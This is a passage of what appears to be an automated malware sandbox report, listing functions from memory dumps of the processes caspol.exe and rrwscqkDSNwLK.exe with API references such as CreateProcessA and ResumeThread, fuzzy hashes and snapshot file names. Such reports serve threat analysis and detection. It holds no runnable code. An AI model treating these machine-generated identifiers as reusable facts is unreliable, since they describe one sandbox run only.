Opcode Fuzzy Hash: 184d6bbf48b1294abe0a4eb0076a0715378aed3fba249288e72bcffb0df21278
Instruction Fuzzy Hash: C731ABB5D002189BCF14CFA9E984AEEFBB5EB49314F24942AE814B7200D735A906CF94

Function 001CD7B8 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 001CD836

Memory Dump Source

Source File: 0000000B.00000002.474807577.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_caspol.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 100daaec3b0bd952e1e4fbc2bf50291eb52655bc6803b6a9affff4ba49324b80
Instruction ID: a7fdf6f8097d33a9f2411c89c6f010a36984590a36e1e7fdbd51d1d03005884a
Opcode Fuzzy Hash: 100daaec3b0bd952e1e4fbc2bf50291eb52655bc6803b6a9affff4ba49324b80
Instruction Fuzzy Hash: B931BAB4D002189FCF14CFA9E984AAEFBB5EF49314F24942AE814B7300D735A905CF94

Function 00701444 Relevance: 1.4, Strings: 1, Instructions: 104COMMON

Download Yara Rule

Strings

gE, xrefs: 00701476

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID: gE
API String ID: 0-3359366371
Opcode ID: 9130a1e2dda73a5eed4768d57e951535bb766f1fd960e5be3ca639fa099535ae
Instruction ID: c89edd0a6bf4d34046dc1d4b13b3caa31a74f309ae54b103ad6e21927afc49b8
Opcode Fuzzy Hash: 9130a1e2dda73a5eed4768d57e951535bb766f1fd960e5be3ca639fa099535ae
Instruction Fuzzy Hash: BB411975D4421ACBDB20CF64CC40BE8B7B5BF99300F6096EAE509A7291E7745AC5DF40

Function 0070163B Relevance: 1.3, Strings: 1, Instructions: 34COMMON

Download Yara Rule

Strings

(, xrefs: 00701F10

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 7dd89f5840e0ade2d89012ce807c88a4775ec3397d51f1e6495525c06a1e377e
Instruction ID: 3dda1216c65511d1c95720fc5ddfaff9b0985ebcc8442e8a585f40e6469434ea
Opcode Fuzzy Hash: 7dd89f5840e0ade2d89012ce807c88a4775ec3397d51f1e6495525c06a1e377e
Instruction Fuzzy Hash: 8A01E47590A218CFDB20CF64C844FECB7B5AB09305F508299D80DA3291C7359E86CF00

Function 00700CF0 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc476c929a63ae0e761e4dc4e22c7f2fd044cbca10efc9b0f0575f06ebfb78d5
Instruction ID: 0c8f4424bc41ccd2f64060202aa338d65f4c04ec90e32b20bb4822f87ddc14f3
Opcode Fuzzy Hash: cc476c929a63ae0e761e4dc4e22c7f2fd044cbca10efc9b0f0575f06ebfb78d5
Instruction Fuzzy Hash: 925129B4E05219CFCB04DFA9D584AAEFBF2BF88310F249625D409A7356D774A841CFA0

Function 007015A2 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2be7d137435fa7b77c6dfc9b3269f5abe66a4fa816169ac8cccaf7777e077afc
Instruction ID: 36de899ae5d8aff9e281e6bd1161b2fc92a23a6062030ca442f8c4a651c13673
Opcode Fuzzy Hash: 2be7d137435fa7b77c6dfc9b3269f5abe66a4fa816169ac8cccaf7777e077afc
Instruction Fuzzy Hash: 35411978909228CFDB24CF54C854BE8B7F5AB4A311F5492DA840EA32D1D7399EC5DF10

Function 007004FE Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db56197c4d5a65913f5f7a91b869acb69920646944268a7fe86e9cc2e8f61952
Instruction ID: e55dbec9a504fc678cfd979754b21fba59c9adeecd708cd222f096cfc46a9de6
Opcode Fuzzy Hash: db56197c4d5a65913f5f7a91b869acb69920646944268a7fe86e9cc2e8f61952
Instruction Fuzzy Hash: 7B31C574E00318CBDB04DFA4D895AAEBBB2FF89311F208129D809A7796DB359D51CF94

Function 007004A4 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e30b89ecfc388029a5739073d2f92178a73ab82acac8e6d379006a812e9668f5
Instruction ID: bf5f815984961d99a5b90653b36c94f660f6c4977b241bb6fd1763b21a0aba38
Opcode Fuzzy Hash: e30b89ecfc388029a5739073d2f92178a73ab82acac8e6d379006a812e9668f5
Instruction Fuzzy Hash: 8B31A6B4D09258DFCB04DFE4E8949ADBBB6FF99311F20912AE80AA7355D73458418F44

Function 0017D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.474588821.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_17d000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beb76c4d60702b41a609ea54fc4035f76556518fbf36b79c98eb8887dfabdd98
Instruction ID: 46e9946be57261d5209dbc6b84a9c910d9bf55ea884654932b9c3cc7d8bb4c1b
Opcode Fuzzy Hash: beb76c4d60702b41a609ea54fc4035f76556518fbf36b79c98eb8887dfabdd98
Instruction Fuzzy Hash: 3521B0B5604248AFDB15DF14E9C0B26BBB5EF84314F24C5A9E8494B256C336D847CB61

Function 0017D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.474588821.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_17d000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 659ad353138d2fc52e4a4cdc4f3cdf7cedde829496efcee78784a3866059a938
Instruction ID: d164b459a808e4dc30d8f9d11a3c02c5438a412f86134e511d9242d1057f6da0
Opcode Fuzzy Hash: 659ad353138d2fc52e4a4cdc4f3cdf7cedde829496efcee78784a3866059a938
Instruction Fuzzy Hash: B321D075604248EFDB15CF14E884B26BB71EF84314F34C5A9E84D4B246C336D847CBA1

Function 007015C6 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c4f20ec79da55566702d4135431824252e8f0790d9bfcc2d0e86a73a8336375
Instruction ID: 5030f3408139375281c4d77d5927b6b68cd83f635dcbb09392449cf59d938094
Opcode Fuzzy Hash: 1c4f20ec79da55566702d4135431824252e8f0790d9bfcc2d0e86a73a8336375
Instruction Fuzzy Hash: 0D21E274E09218CFCB60CF94C890BECBBF5AB49315F6091A9940EA7295D7349E82DF40

Function 0017D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.474588821.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_17d000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 565f75d38e4f7350f063d62ce24505424e1b395d29b5c826c31e1f917094453a
Instruction ID: ce486fcf9abe6ec95ceb8dbf38f3db559b2253b8cea6385595494ee791a13ebc
Opcode Fuzzy Hash: 565f75d38e4f7350f063d62ce24505424e1b395d29b5c826c31e1f917094453a
Instruction Fuzzy Hash: 92218B755093848FDB12CF24D994B15BF71EF46314F28C5EAD8498F2A7C33A984ACB62

Function 007004E5 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a24ab74e02f77ec5081c3d7e20174c1e5b27d483bbd0e5ca08becabc6325026a
Instruction ID: 5053b378898c3238a4a99c81697ad5078a26447c14a9ea2e54b52439db939f05
Opcode Fuzzy Hash: a24ab74e02f77ec5081c3d7e20174c1e5b27d483bbd0e5ca08becabc6325026a
Instruction Fuzzy Hash: A5217EB8D09258DFCB00DFA4E8949ACBBB6FF49321F20912AE80AA7355D7349841DF44

Function 007013EC Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95865726af6f6429329641a574d2a101c4cb1fd41b72e15ce12f83483b20db28
Instruction ID: 08121c16ad1bb685f90a00e213100efa8220efb7ee2fe52240561671d6261683
Opcode Fuzzy Hash: 95865726af6f6429329641a574d2a101c4cb1fd41b72e15ce12f83483b20db28
Instruction Fuzzy Hash: 1D114974945218DFDB20CB54CC50BECB7B8AB19301F6091EAE54AA72C0C7B49AC1CF40

Function 00701A1A Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19d2b55d65778630c630e67a7de00076429a8ece8c98b007b0180d4695cf3253
Instruction ID: 1fb0f5664f4101ed1db898dcb476ee1350741ee40d26d61ee316885b9c3d81b4
Opcode Fuzzy Hash: 19d2b55d65778630c630e67a7de00076429a8ece8c98b007b0180d4695cf3253
Instruction Fuzzy Hash: 92117C38908214CFDB20CF54C894BECBBF5AB4A311F5481DA840DA7291C7359E86CF10

Function 0017D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.474588821.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_17d000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
Instruction ID: 0041194c1817ab7fc62789af46a91491cb852afa837990730b6338af1206f0ea
Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
Instruction Fuzzy Hash: 3F117975944284DFDB12CF14D5C4B15BBB1FF84314F28C6A9D8494B656C33AD84ACBA2

Function 00700B80 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 826b57a3baa0925e7f125832fb17f8fe94a5ee5e45389819693f0b1d622db435
Instruction ID: fb2836c0fb150475da6a9f7966d05f483a815721feee288b2355d0fe74db2946
Opcode Fuzzy Hash: 826b57a3baa0925e7f125832fb17f8fe94a5ee5e45389819693f0b1d622db435
Instruction Fuzzy Hash: B611F3B8E05309DFCB44DFA9C9456AEBBF5BB89301F2091AAC819A3345E7745A41CF90

Function 0070141C Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7470422207d652040dfdaa9ddc92aa1dfa8fed14e889f8ffdb7e3aabd5a946e0
Instruction ID: 495fad48a6974c4ee1c38fadae779ddf29dc5f2943c3f9cbdd3e62a76d18e50e
Opcode Fuzzy Hash: 7470422207d652040dfdaa9ddc92aa1dfa8fed14e889f8ffdb7e3aabd5a946e0
Instruction Fuzzy Hash: 5B11C574A45218DFDB60CF54CC90BECB7B8AB59301F60919AE90EA72C1D7B4AA85DF40

Function 0070181B Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c59c2235abd258fee4195480745f071ad870c6ba2063e7e9390903c0d433e63d
Instruction ID: cb36dd734a202d52987276dd365c170655398907c905bc6ddc480c0e9d73713e
Opcode Fuzzy Hash: c59c2235abd258fee4195480745f071ad870c6ba2063e7e9390903c0d433e63d
Instruction Fuzzy Hash: 8A11E874908218CFDB60DF64C885BECB7F5AB59300F5445D9D40EAB292D7755A89CF10

Function 0070154F Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2328d0bb7019d2470e3348701d099192f8bdcdac91c6f360999e9f15aa1112ef
Instruction ID: fec6af16145e0a7bec08fbbb28e68259d848787cfcb21da9943af793ec242752
Opcode Fuzzy Hash: 2328d0bb7019d2470e3348701d099192f8bdcdac91c6f360999e9f15aa1112ef
Instruction Fuzzy Hash: 6401D675A45218DFDB20CB54CC81BECB7B8AB59301F649299E50AAB2C1C7B46A85CF40

Function 00701AE3 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 463e0edfec3a9cfeedb5996bcf3bd5887f58470e5b637fa5fe2fdab8d7e9dc1d
Instruction ID: bf128bd80617f79e232d23f3d285c8be15c55fac92b2f1c98cd62e281d194f67
Opcode Fuzzy Hash: 463e0edfec3a9cfeedb5996bcf3bd5887f58470e5b637fa5fe2fdab8d7e9dc1d
Instruction Fuzzy Hash: 5D014074D09254CFCB51CB64CC94ADCBBB1BF5A304F2481EAD509AB296C3315A41DF00

Function 0070190C Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b2f575325970aca7d89472250990046e24a1c6549c221e959d53f865147a71e
Instruction ID: 773b1d828d09ad626a057a8f3378e3787c72c7e48e3c7cfeb514cf7437a11f03
Opcode Fuzzy Hash: 2b2f575325970aca7d89472250990046e24a1c6549c221e959d53f865147a71e
Instruction Fuzzy Hash: FB011935905228DFCF20CFA0C950BEDBBF9AB59315F6450D9940DA72A2C235AA86DF41

Function 00702240 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baecf468abd786dcbd865a6ff23cda499ca7865557ff953d3141671766280fcb
Instruction ID: fc04435544efad7e5d0e8a313d8ee216010a4e70f3a9d0d57982a55b0cc09562
Opcode Fuzzy Hash: baecf468abd786dcbd865a6ff23cda499ca7865557ff953d3141671766280fcb
Instruction Fuzzy Hash: D7F0F974E00209DBCB40DFB9C9445ADF7F5FB49300F1485AA8818E3345E7309A42DB40

Function 00701030 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b5a3b0d788073b18a629d2fb1af2e61a34c38db0987fe3b34ca122dd71ea464
Instruction ID: 142cfb46a8d6cae7c548a1add783dead9c4d62c913804904abfe9dbda4f27c60
Opcode Fuzzy Hash: 6b5a3b0d788073b18a629d2fb1af2e61a34c38db0987fe3b34ca122dd71ea464
Instruction Fuzzy Hash: 06F03030D09388DFCB41DFB8E9646ADBFB4AB4B302F1492AAC449A3293D6344A45DF05

Function 0070188C Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a2661f5a437f75ce437cadc6a6c8329a84e80ae28b56aeba2af54b585b14bd4
Instruction ID: e43a989f3193d52ecdc38e5608d6abb137c124950a6cbda7608c079766ebc102
Opcode Fuzzy Hash: 2a2661f5a437f75ce437cadc6a6c8329a84e80ae28b56aeba2af54b585b14bd4
Instruction Fuzzy Hash: 8F01A434918354CFCB21CB24C864AECBBF5BB06320F1486E6881E972E2D7348946CF50

Function 00701D1E Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9228ecc31c4eea46e7692f0acd1e9bd2e3d5d0151863a12433885bd34b9aea9
Instruction ID: c3068366cab7ff65b9201217957cd41d3c4de3637583dd91b3005fcf3bf790ec
Opcode Fuzzy Hash: b9228ecc31c4eea46e7692f0acd1e9bd2e3d5d0151863a12433885bd34b9aea9
Instruction Fuzzy Hash: 02F0A934944214CFD720CF10C984AF9B7F5FB4A322F5486DA884E922E6C7349E82CF10

Function 007016D0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e5bad95a6da5cbbab234eb20daa514be0d5147525c75a3e674c8d15c1adc037
Instruction ID: 0ac6523687fcfd6607839e85e5449972366e41091394c1fdb501e0ad4430cece
Opcode Fuzzy Hash: 3e5bad95a6da5cbbab234eb20daa514be0d5147525c75a3e674c8d15c1adc037
Instruction Fuzzy Hash: 9D01D9B4900228DFDBA0DF54CC81BD8B7F4AB48311FA081D9E609A7281DB399E89CF50

Function 00701040 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8bb06039e3df6fb288c9452049a910885138766e575752423ada7f13b9f192b
Instruction ID: d83eacd92075564bec96b41b4bff19531bab7b03cb5381d8fded67c137273026
Opcode Fuzzy Hash: f8bb06039e3df6fb288c9452049a910885138766e575752423ada7f13b9f192b
Instruction Fuzzy Hash: 3AF0E530D0530CDFCB44DFA4D9546ADBBF9BB4A302F5092A6C449A3356D7345A45DF48

Function 007008C0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea9fa089c3cfcb057865e0fe0fd2f2a0ce30e1de9d917c3ddf53a5443f77b752
Instruction ID: ce5cd1607c31ea695c30740c544cf21839ec233587de480bd415e1317c0a4014
Opcode Fuzzy Hash: ea9fa089c3cfcb057865e0fe0fd2f2a0ce30e1de9d917c3ddf53a5443f77b752
Instruction Fuzzy Hash: 5AE0B674910208EFC740DFB8D59465CBBF4AB09311F2041AAD908A73A1E6309A44CF81

Function 00700988 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48dc52642a75c3a3372bf1afe10e4bd96c288f7436a0b4d42b659f9ed9b247
Instruction ID: 140cdb08fb3eb81c7bfef290a7c3f34a570f76fa0406d1e14438e78f49814a48
Opcode Fuzzy Hash: 2a48dc52642a75c3a3372bf1afe10e4bd96c288f7436a0b4d42b659f9ed9b247
Instruction Fuzzy Hash: 1AD05E3080520CEBD704DFA8E9507ADBBB8AB86311F2042A9C84823382D6302E55DBC6

Function 00700AA0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1919af0f3cdfed69c75edb186e49ba2af8591868a2e25d9eefcf9090a521c7a7
Instruction ID: 7d54d953406731a76e52ee25ee1e2a19fb5958233173d0549d49b715f60ff875
Opcode Fuzzy Hash: 1919af0f3cdfed69c75edb186e49ba2af8591868a2e25d9eefcf9090a521c7a7
Instruction Fuzzy Hash: 15D01770D0030CEFCB40EFB8D95579CBBF4AB04212F1081BAC80893381E6309A80CF81

Function 00700B18 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa9dd95c0336f36358dabcd241d0a5f18e4338a50050265104dfa3ba18044e1c
Instruction ID: abdb80d3dbdd8d09ca9ded583ab6461dbab1131dec5d5bc7a4e9714b8e9179a1
Opcode Fuzzy Hash: aa9dd95c0336f36358dabcd241d0a5f18e4338a50050265104dfa3ba18044e1c
Instruction Fuzzy Hash: CCC0127080120CEBC714DFA9D911B6D776CD741215F0001A9C40413291DA715D00DB95

Non-executed Functions

Function 001CC178 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.474807577.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0b3a9cbcda62fae8863086a3118cbe47ad047f4642883ac64c52c5fedebd88c
Instruction ID: cc99bda15512ad2331698afaf4edd5190be5e4c893632857ea55485655436f30
Opcode Fuzzy Hash: b0b3a9cbcda62fae8863086a3118cbe47ad047f4642883ac64c52c5fedebd88c
Instruction Fuzzy Hash: A9E1FB74E001598FCB14DFA9C590AADFBB2FF89304F248169D919AB356D731AD42CFA0

Function 001CC5B0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.474807577.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1a076bebf2ea1e76aaed589039e7fe6b0fed79deab8a38054ac7183f07405e9
Instruction ID: 3157e7d4d6a357c5f3950a9a95511301c31ef3ac93d9c1ad33c719594065dbc6
Opcode Fuzzy Hash: b1a076bebf2ea1e76aaed589039e7fe6b0fed79deab8a38054ac7183f07405e9
Instruction Fuzzy Hash: AFE1FD74E006598FCB14DFA9C590AAEFBB2FF89304F248169D519A7356D730AD42CFA0

Function 001CD9D8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.474807577.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebee9c6b7f7e6d049d8fd2db4b8b9c1c90daa9c338c3a3f7323cce48afacfda9
Instruction ID: 55aa62eb253c7af772cd6c4d43e0d2db3d5e0f0093d543ac5a41f6a75b7d9382
Opcode Fuzzy Hash: ebee9c6b7f7e6d049d8fd2db4b8b9c1c90daa9c338c3a3f7323cce48afacfda9
Instruction Fuzzy Hash: 6FE1FB74E002598FCB14DFA9D590AADFBB2FF89304F248169D919A7356D730AD42CF60

Function 001CCAF8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.474807577.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1607807a9e7963e575862985e0ad87152010163fbccfebde9564b49704d7796c
Instruction ID: b2a2e769a01616e646e6861bec463a0a6a669921b62313fccae8f856972692a2
Opcode Fuzzy Hash: 1607807a9e7963e575862985e0ad87152010163fbccfebde9564b49704d7796c
Instruction Fuzzy Hash: 4EE1FB74E006598FCB14DFA9C590AADFBB2FF89304F248169D919A7356D730AD42CFA0

Analysis Process: rrwscqkDSNwLK.exePID: 2148, Parent PID: 1404COMMON

Execution Graph

Execution Coverage:	12.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	134
Total number of Limit Nodes:	13

Executed Functions

Function 001DE2C5 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 327
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001DE597

Strings

gA, xrefs: 001DE61A
gA, xrefs: 001DE4EA
gA, xrefs: 001DE6DF

Memory Dump Source

Source File: 00000015.00000002.493089876.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1d0000_rrwscqkDSNwLK.jbxd

Similarity

API ID: CreateProcess
String ID: gA$gA$gA
API String ID: 963392458-3592020018
Opcode ID: 06593a56d062d6598841450e0fc4dc30d9fea90e265527281a16140729f323ba
Instruction ID: dfd28975610cc96b34fa19ef7b25e2197ff74530b959f1a720b92aaf58815fc7
Opcode Fuzzy Hash: 06593a56d062d6598841450e0fc4dc30d9fea90e265527281a16140729f323ba
Instruction Fuzzy Hash: B8C12570D002198FDF24DFA8C955BEEBBF1BB09304F0091AAD859B7290DB749A85CF95

Function 001DE2D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001DE597

Strings

gA, xrefs: 001DE61A
gA, xrefs: 001DE4EA
gA, xrefs: 001DE6DF

Memory Dump Source

